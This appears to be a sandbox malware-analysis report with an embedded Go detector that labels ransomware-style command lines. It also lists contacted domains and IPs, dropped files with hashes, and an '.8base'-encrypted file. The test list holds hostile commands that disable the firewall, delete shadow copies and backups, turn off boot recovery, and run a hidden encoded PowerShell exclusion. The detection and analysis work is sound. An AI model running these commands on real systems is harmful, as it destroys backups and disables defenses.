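// Classify returns the labels one command line triggers and, when it carries an
// -enc argument, the decoded script (which is also fed to the rules).
func Classify(cmdline string) (labels []string, decoded string) {
	text := strings.ToLower(cmdline)
	if m := encArg.FindStringSubmatch(cmdline); m != nil {
		if s, err := DecodeEncodedCommand(m[1]); err == nil {
			decoded = s
			text += " " + strings.ToLower(s)
		}
	}
	for _, r := range impactRules {
		if r.re.MatchString(text) {
			labels = append(labels, r.label)
		}
	}
	return labels, decoded
}

// Summarize counts labels over a batch of command lines.
func Summarize(lines []string) map[string]int {
	counts := map[string]int{}
	for _, l := range lines {
		labels, _ := Classify(l)
		for _, lab := range labels {
			counts[lab]++
		}
	}
	return counts
}

// Command lines copied from the Processes section of this report; the WerFault
// line is a negative control.
var reportCommandLines = []string{
	`netsh advfirewall set currentprofile state off`,
	`vssadmin delete shadows /all /quiet`,
	`netsh firewall set opmode mode=disable`,
	`wmic shadowcopy delete`,
	`bcdedit /set {default} bootstatuspolicy ignoreallfailures`,
	`bcdedit /set {default} recoveryenabled no`,
	`wbadmin delete catalog -quiet`,
	`powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==`,
	`C:\Windows\SysWOW64\WerFault.exe -u -p 4812 -s 216`,
}

func main() {
	for _, l := range reportCommandLines {
		labels, decoded := Classify(l)
		fmt.Printf("%v\t%s\n", labels, l)
		if decoded != "" {
			fmt.Printf("\tdecoded -enc: %s\n", decoded)
		}
	}
	fmt.Println(Summarize(reportCommandLines))
}
```

The rules are matched against the lowercased line so that WMIC's case-insensitive verbs and mixed-case PowerShell switches do not slip past them, and the decoded -enc text is appended to the same string so a rule written for the plain cmdlet also fires on its encoded form. Feeding it Sysmon event 1 or Security 4688 command lines instead of the constructed list is the obvious next step.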

Network

Country Destination Domain Proto
US 209.197.3.8:80 N/A tcp
US 8.8.8.8:53 47.125.24.20.in-addr.arpa udp
US 8.8.8.8:53 serverlogs37.xyz udp
US 8.8.8.8:53 servblog757.xyz udp
DE 45.89.127.159:80 servblog757.xyz tcp
IT 179.43.162.58:80 179.43.162.58 tcp
NL 145.14.157.71:80 145.14.157.71 tcp
US 8.8.8.8:53 159.127.89.45.in-addr.arpa udp
US 8.8.8.8:53 58.162.43.179.in-addr.arpa udp
US 8.8.8.8:53 71.157.14.145.in-addr.arpa udp
US 8.8.8.8:53 septrex45.xyz udp
EE 159.253.18.136:80 septrex45.xyz tcp
US 8.8.8.8:53 136.18.253.159.in-addr.arpa udp
DE 45.89.127.159:80 servblog757.xyz tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
RU 91.215.85.210:42902 91.215.85.210 tcp
US 8.8.8.8:53 210.85.215.91.in-addr.arpa udp
US 209.197.3.8:80 N/A tcp
US 209.197.3.8:80 N/A tcp
US 8.8.8.8:53 62.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
GB 96.16.110.41:443 N/A tcp
US 8.8.8.8:53 dexstat255.xyz udp
DE 185.234.72.142:46578 dexstat255.xyz tcp
US 8.8.8.8:53 142.72.234.185.in-addr.arpa udp

Files

memory/1960-133-0x0000000002520000-0x0000000002535000-memory.dmp

memory/3656-134-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1960-135-0x0000000002540000-0x0000000002549000-memory.dmp

memory/3656-136-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3656-138-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2636-137-0x00000000014D0000-0x00000000014E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D5D3.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

memory/4200-152-0x000001F014450000-0x000001F0145BA000-memory.dmp

memory/4200-153-0x000001F02EBD0000-0x000001F02EBE0000-memory.dmp

memory/4200-154-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-155-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-157-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-161-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-159-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-163-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-165-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-167-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-171-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-169-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-173-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-175-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-177-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-179-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-181-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-183-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-185-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-187-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-189-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-191-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-193-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-195-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-197-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-199-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-201-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-203-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-205-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-207-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

memory/4200-209-0x000001F02EA10000-0x000001F02EB46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

memory/1168-247-0x0000000000DB0000-0x000000000140E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E834.exe

MD5 6ae917525435e23b07d15537fb40aea0
SHA1 7c85b447bb5608ba7fb6a332c033c0cdad0430ae
SHA256 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
SHA512 23e5f94e964d53d72af0d6ad31da309539116a9963806ce7b0d3c028a69ab343df6cd6f3989b280e70a285395425a1cb93492fe5030968558ada5f7de047aaed

memory/1816-255-0x0000000000540000-0x000000000058C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

memory/1816-273-0x0000000005320000-0x00000000058C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EA96.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/1816-276-0x0000000004E50000-0x0000000004EE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EA96.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll

MD5 5f449db8083ca4060253a0b4f40ff8ae
SHA1 2b77b8c86fda7cd13d133c93370ff302cd08674b
SHA256 7df49cba50cc184b0fbb31349bd9f2b18acf5f7e7fac9670759efa48564eaef1
SHA512 4ce668cf2391422ef37963a5fd6c6251d414f63545efb3f1facb77e4695cd5a8af347bd77fc2bebfa7fd3ef10ff413a7acfde32957037a51c59806577351825f

memory/1168-279-0x0000000005DD0000-0x0000000005DE0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ED76.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

memory/1816-292-0x0000000004E10000-0x0000000004E1A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ED76.exe

MD5 8d7ebe871589d79f195f240dcef43a57
SHA1 f5315edc9bfeb6f37c9df6ad1f10cb3363412d96
SHA256 19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8
SHA512 244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

memory/1168-286-0x0000000071E80000-0x0000000072460000-memory.dmp

memory/1816-304-0x00000000050B0000-0x00000000050C0000-memory.dmp

memory/4552-307-0x0000000000E00000-0x0000000000E80000-memory.dmp

memory/4552-309-0x0000000000B20000-0x0000000000B8B000-memory.dmp

memory/4480-314-0x00000000007E0000-0x00000000007EF000-memory.dmp

memory/1668-319-0x0000000000E80000-0x0000000000E8C000-memory.dmp

memory/1284-318-0x0000000002700000-0x0000000002736000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EA96.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/1284-342-0x00000000052B0000-0x00000000058D8000-memory.dmp

memory/1284-353-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/1284-355-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/2424-357-0x0000000001C40000-0x0000000001C45000-memory.dmp

memory/452-361-0x0000000000BE0000-0x0000000000BE9000-memory.dmp

memory/1284-367-0x0000000005110000-0x0000000005132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eltmb010.jxp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1284-375-0x0000000005A60000-0x0000000005AC6000-memory.dmp

memory/452-359-0x0000000001C40000-0x0000000001C45000-memory.dmp

memory/1284-379-0x0000000005AD0000-0x0000000005B36000-memory.dmp

memory/1164-389-0x0000000000E70000-0x0000000000E7B000-memory.dmp

memory/4552-391-0x0000000000B20000-0x0000000000B8B000-memory.dmp

memory/1284-431-0x0000000005FF0000-0x000000000600E000-memory.dmp

memory/2324-461-0x0000000000C70000-0x0000000000C7B000-memory.dmp

memory/1284-464-0x0000000006410000-0x0000000006454000-memory.dmp

memory/1284-494-0x00000000072F0000-0x0000000007366000-memory.dmp

memory/1284-519-0x00000000079F0000-0x000000000806A000-memory.dmp

memory/1284-521-0x0000000007390000-0x00000000073AA000-memory.dmp

memory/4200-524-0x000001F02EBD0000-0x000001F02EBE0000-memory.dmp

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\EA96.exe

MD5 0f281d2506515a64082d6e774573afb7
SHA1 8949f27465913bf475fceb5796b205429083df58
SHA256 2288a0c896757647538a7dab5e0c980b70b173ed36c9e6206f6701dfd4112cfb
SHA512 f4ddb22c7dec04ca862d3df88e285025e02c185dbb2c061e9d0092ba3e8e8e083ca55612aae6b2d5792038729c55c0eaf193048991c0b06c8639a52017102622

memory/1284-528-0x0000000004C70000-0x0000000004C80000-memory.dmp

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[2A5E155A-3483].[[email protected]].8base

MD5 0dc99a7d6e168c3c0c5d6ed232d94c52
SHA1 bdf28326bd6ee0e546c1a2596545b79feb019e9d
SHA256 40ef8da2345a64d9d7a5450969f9e0093b7981b47ad63a902f47414111215708
SHA512 0cc8a5723cdbacf98c8a42119debd8edccbc09276f23f7e38c99250952d485599e4b733d49888caa36fe7bbaab31f7e12ad0c8c28f209e796c37950aab892c6a

memory/2056-526-0x0000000000FE0000-0x0000000000FEF000-memory.dmp

memory/1248-745-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/1248-782-0x00000000001C0000-0x00000000001C9000-memory.dmp

memory/4476-806-0x0000000000D40000-0x0000000000D4C000-memory.dmp

memory/4476-797-0x00000000001C0000-0x00000000001C9000-memory.dmp

memory/1168-1308-0x0000000071E80000-0x0000000072460000-memory.dmp

memory/1036-1311-0x0000000000E70000-0x0000000000E79000-memory.dmp

memory/2504-1314-0x0000000000E70000-0x0000000000E79000-memory.dmp

memory/1036-1310-0x0000000000D40000-0x0000000000D4C000-memory.dmp

memory/2504-1315-0x00000000001F0000-0x00000000001F9000-memory.dmp

memory/1168-1417-0x0000000005DD0000-0x0000000005DE0000-memory.dmp

memory/1816-1476-0x00000000050B0000-0x00000000050C0000-memory.dmp

memory/4348-1493-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/2732-1886-0x0000000000A80000-0x0000000000AA7000-memory.dmp

memory/2732-1917-0x0000000000A80000-0x0000000000A89000-memory.dmp

memory/2008-1962-0x0000000000ED0000-0x0000000000EDB000-memory.dmp

memory/1284-2237-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/1284-2241-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/452-2243-0x0000000001C40000-0x0000000001C45000-memory.dmp

memory/2008-2245-0x0000000000ED0000-0x0000000000EDB000-memory.dmp

memory/4456-2249-0x00000000003F0000-0x00000000003FD000-memory.dmp

memory/4456-2246-0x0000000000ED0000-0x0000000000EDB000-memory.dmp

memory/4440-2372-0x00000000003F0000-0x00000000003FD000-memory.dmp

memory/4440-2377-0x0000000000790000-0x000000000079B000-memory.dmp

memory/1284-2817-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/4200-2818-0x000001F014B10000-0x000001F014B11000-memory.dmp

memory/2056-3073-0x0000000000C70000-0x0000000000C7B000-memory.dmp

memory/4200-3080-0x000001F02ECB0000-0x000001F02ED4E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\E4D8.exe

MD5 6992433acbb1398c0b539d1cafdf47c4
SHA1 6761b00b2843b79ce8840d1b80170d8e13b588da
SHA256 5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304
SHA512 2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

C:\Users\Admin\AppData\Local\Temp\SRD.bat

MD5 809325b0bf02d5f44ce3d005b018cc12
SHA1 c39206a6b0e5dfaf5d4a50c5887b8400d55eda87
SHA256 136c478f4bd8baf478b13a43d31d62d69669c40453ca3fe81ddfebe2ff6ab0c4
SHA512 a8b1ee15056f625ebe89a9968b2820c7bad7fc76197f705d785ecee78fbe93355cae2d784cadfdf68fc23533ab2bc8e3bd67de9e1bba07b1c4f5d6c3529a7473

C:\Users\Admin\AppData\Local\Temp\sv.bat

MD5 ca039530887fa8dce08b07808582c4c7
SHA1 15b27c115ecf430bb3adccba408e6cdd6b94945c
SHA256 567b3fbd05b70248c6961e4cf5fc0196ae3f84d190402ca0d72e849007baf393
SHA512 9e7c3f51791c4c6aaa745622ae698cec04a75cbc716b267b4f258d599f56befab3d7142e2ce6dcac4d46d444fe2225c987ba1662788e47c39eb8538b7ab050d8

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
(SRD.bat.exe and sv.bat.exe share this hash, and both are launched with PowerShell's -w hidden -c syntax: the .bat.exe files are a renamed copy of a PowerShell host, not batch files. The script they run is stored in the matching .bat next to them.)

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

MD5 c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1 f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA256 73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA512 6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 3337d66209faa998d52d781d0ff2d804
SHA1 6594b85a70f998f79f43cdf1ca56137997534156
SHA256 9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd
SHA512 8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

C:\Users\Admin\AppData\Local\FallbackBuffer\tzvkgtxv\PublicKey.exe

MD5 4ee88295d65b7a6e566d200a1c842801
SHA1 5dfb320e933425cea8188f8f7dab346796c3b090
SHA256 b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b
SHA512 caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 e962f362e96d032ba9dee1b5217fe97e
SHA1 9c481e8e5b3508681ca306931d117ccf051b6ea0
SHA256 df1ef9b36053aa1257cf03e03fb307ec16449a6353f8185805cc6b44e1803e0a
SHA512 c8f055990192413d5e94e5862df75314c79cc78cf9601e353d75b9f5764ec63bb04232a3c4b8e821b98b2e55c2a0e5e3e5603b1ad5b863cf778423095aad94f7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 5fb440ab3a7164dd8090cbb3c62c3599
SHA1 af76591971a44da8b52b5cca78c345ba3ceecd35
SHA256 9eb48e3425f94dffb86708e700ea2389e4d0e6c22206e60a32bb8784f15a034b
SHA512 799fbe367d0a13742d2340be2fbb36d40b9a5511ade06e94fb2170866e23bf1a555d5c50c8f7aadc5d94c9c719f06da89a055dbf815e23620e8b7223a60029f8
